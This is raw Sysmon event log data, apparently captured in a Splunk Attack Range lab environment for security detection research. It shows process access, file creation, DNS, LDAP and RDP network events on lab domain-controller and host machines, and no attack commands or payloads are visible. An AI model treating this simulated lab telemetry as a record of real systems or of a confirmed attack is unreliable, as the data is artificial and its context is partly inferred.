10341000x8000000000000000205563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.387{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.003{2E1864BB-FA2C-6299-4D07-000000005F02}33763172C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cf1e0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF80036E68C48)|UNKNOWN(FFFF85B2AA2A5B68)|UNKNOWN(FFFF85B2AA2A5CE7)|UNKNOWN(FFFF85B2AA2A0371)|UNKNOWN(FFFF85B2AA2A1D3A)|UNKNOWN(FFFF85B2AA29FFF6)|UNKNOWN(FFFFF80036B7E503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+d2a3b|C:\Windows\System32\SHELL32.dll+1197ca|C:\Windows\System32\SHCORE.dll+33fbd 10341000x8000000000000000205561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.003{2E1864BB-FA2C-6299-4D07-000000005F02}33763172C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+cecc1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF80036E68C48)|UNKNOWN(FFFF85B2AA2A5B68)|UNKNOWN(FFFF85B2AA2A5CE7)|UNKNOWN(FFFF85B2AA2A0371)|UNKNOWN(FFFF85B2AA2A1D3A)|UNKNOWN(FFFF85B2AA29FFF6)|UNKNOWN(FFFFF80036B7E503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+d2a3b|C:\Windows\System32\SHELL32.dll+1197ca|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.003{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFd7d348.TMPMD5=A303D473BA814FD6FAB43C1CB00819D2,SHA256=AA2A030E0B028A696C3F21587D451CD5CB68ED59621BA6CE0EF8E95415BF6D12,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:39.787{2E1864BB-FA2C-6299-4D07-000000005F02}33766668C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-270A-000000005F02}4676C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+dadff|C:\Windows\System32\SHELL32.dll+dbd25|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13beff|C:\Windows\System32\windows.storage.dll+13ac83|C:\Windows\System32\windows.storage.dll+1391af|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:39.787{2E1864BB-FA2C-6299-4D07-000000005F02}33766668C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-270A-000000005F02}4676C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+dbc3e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13beff|C:\Windows\System32\windows.storage.dll+13ac83|C:\Windows\System32\windows.storage.dll+1391af|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:39.787{2E1864BB-FA2C-6299-4D07-000000005F02}33766668C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-270A-000000005F02}4676C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+db054|C:\Windows\System32\SHELL32.dll+dbc07|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13beff|C:\Windows\System32\windows.storage.dll+13ac83|C:\Windows\System32\windows.storage.dll+1391af|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:39.786{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-280A-000000005F02}7828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+dadff|C:\Windows\System32\SHELL32.dll+dc3b0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:39.785{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-280A-000000005F02}7828C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+123a10|C:\Windows\System32\SHELL32.dll+dc36c|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:39.785{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-280A-000000005F02}7828C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+db054|C:\Windows\System32\SHELL32.dll+dc340|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:39.785{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-0F1D-629A-280A-000000005F02}7828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:39.734{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE058B71F5308A09B6D96C56C58BB909,SHA256=52A7346D0D94498088B83F60153B5764D3AF9F0046F80E3C299BC6AB43DE8ED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044464Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:39.374{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D17F1D9A04F660D7B1305C89A0343A2D,SHA256=A7831DE93BFAD275795AD7F28AEC9040D7CB423F559262596B99353B42B767C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:37.844{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56391-false10.0.1.12-8000- 23542300x800000000000000044463Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:39.236{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\respondent-20220603103302-220MD5=1368864ED3964BDCAF310770CE48D2A5,SHA256=F4EE2B140FD43EB5772AE1FE5CF5CF61204868E3BB74D3908306C7C1A703C3E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:40.865{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A78945D58613EF915A9B4869820180A1,SHA256=07DA412AB3DF81351FE339A9BAED4214919B6DB28CAA64671AEB16D55C0172B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044466Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:40.466{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=689074D503DED71D4855A20E6F0B2EE3,SHA256=0EB0DEF4E889ACB4CDB3AADD9001A3188C6CB82B6C96364816B11A3197FA0507,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.096{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53351-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.096{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53351- 354300x8000000000000000205586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.096{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62643-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.095{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62643-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.095{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53351- 354300x8000000000000000205583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.095{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53351-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.090{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56392-false140.82.121.6lb-140-82-121-6-fra.github.com443https 354300x8000000000000000205581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.066{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local51416-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.066{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local51416- 354300x8000000000000000205579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.066{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61806-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.050{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61806-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.050{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local51416- 354300x8000000000000000205576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.049{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local51416-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 23542300x800000000000000044465Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:40.250{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\surveyor-20220603103300-221MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044467Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:41.561{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC90B006C0394911CFEF68FE9B47E924,SHA256=F6E5EB1DF2106AC104FB494BBD624F199D35BD38BD6965B38B09905A63C69197,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:41.902{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6520F98E633F1C85FF8EF5441CC0E863,SHA256=AB2335F31A970632D3ACDFACB66CCF7FEA5EB32C12CC72A54747D4A72996920E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044468Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:42.655{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFAB7E0F8748CB9AC3E3CEA214D9AEBC,SHA256=7275961AE46EE1F7802E1C97A1EF3D0B8011B59C0AE0298941AE98C7C1B51454,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:42.933{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBD0AEA07822C8AABD6905E99510035E,SHA256=6D7A60BC0E224B721501AA6B7790FAA329EA800EFA923E68A8FA3385CFB87D37,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:40.759{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56393-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:40.759{2E1864BB-E14E-6299-2B00-000000005F02}1040C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56393-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 23542300x8000000000000000205591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:42.233{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2B702D874F557C9E5F067C39F8EB895,SHA256=E6745256DCD88269C8CB5034F648A3E4E2D0BE41A36D625CB3A8B5DD2513E43A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044469Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:43.748{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E97F47CD6E9D0E8473CBE9CD023F5B6B,SHA256=94274256B39A015EE3225C042D24FA9DF0A3C1AA22CB75FDC524CB0D0F1333D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:43.949{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67D80AEE21F29593793EC85159D562AC,SHA256=95C38AB8495A33CF855C124825593D52C7A6E5139ABB956CF91110348F6BE3C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:43.317{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044470Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:44.842{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65E582B98F4B20FB5D8E76C163734508,SHA256=4927F16486C4571FCCC5020972B378DDA79E8A0E3530566732D9DADAAD21D0B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:42.912{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56394-false10.0.1.12-8089- 354300x8000000000000000205600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:41.931{2E1864BB-E13E-6299-0F00-000000005F02}308C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse46.243.179.10146.243.179.101.leadertelecom.ru3729-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local3389ms-wbt-server 23542300x8000000000000000205599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:44.002{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\snap.datMD5=1C50704BF070B8EC908A3D3C2FD29F3E,SHA256=EB0401B43000452164A32F00666C3B01A0A2CC1D1F2B883C10848A7616CE3077,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:44.002{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_records.datMD5=CBEA5EF71455BE9885408D36DE3EB7BB,SHA256=D6894BB893A546CCF0EE0439D986A77C60585AEB8C5E5812ECB257EF919BE0F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:44.002{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_index.datMD5=5B00ED05EAD8E00D65FB397B0BC9CF63,SHA256=7032CE1696785AFDEC9E639F025F094F15132D0A7967AD70BB8A389645286112,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044473Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:45.936{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A60BDD1D9503398C66E5368C442F53B7,SHA256=E85BA6A633F7CA06622BF7FCB93ED7EB2AC1BB302297B3B1F2E91B68910A6F6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:45.050{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21FA63A629BFA505F8AAB8BC11F72ECF,SHA256=67100A40BCD66FA82E098A2D05AB8BF126F8718666A51848DB020E2248603A41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044472Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:45.436{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 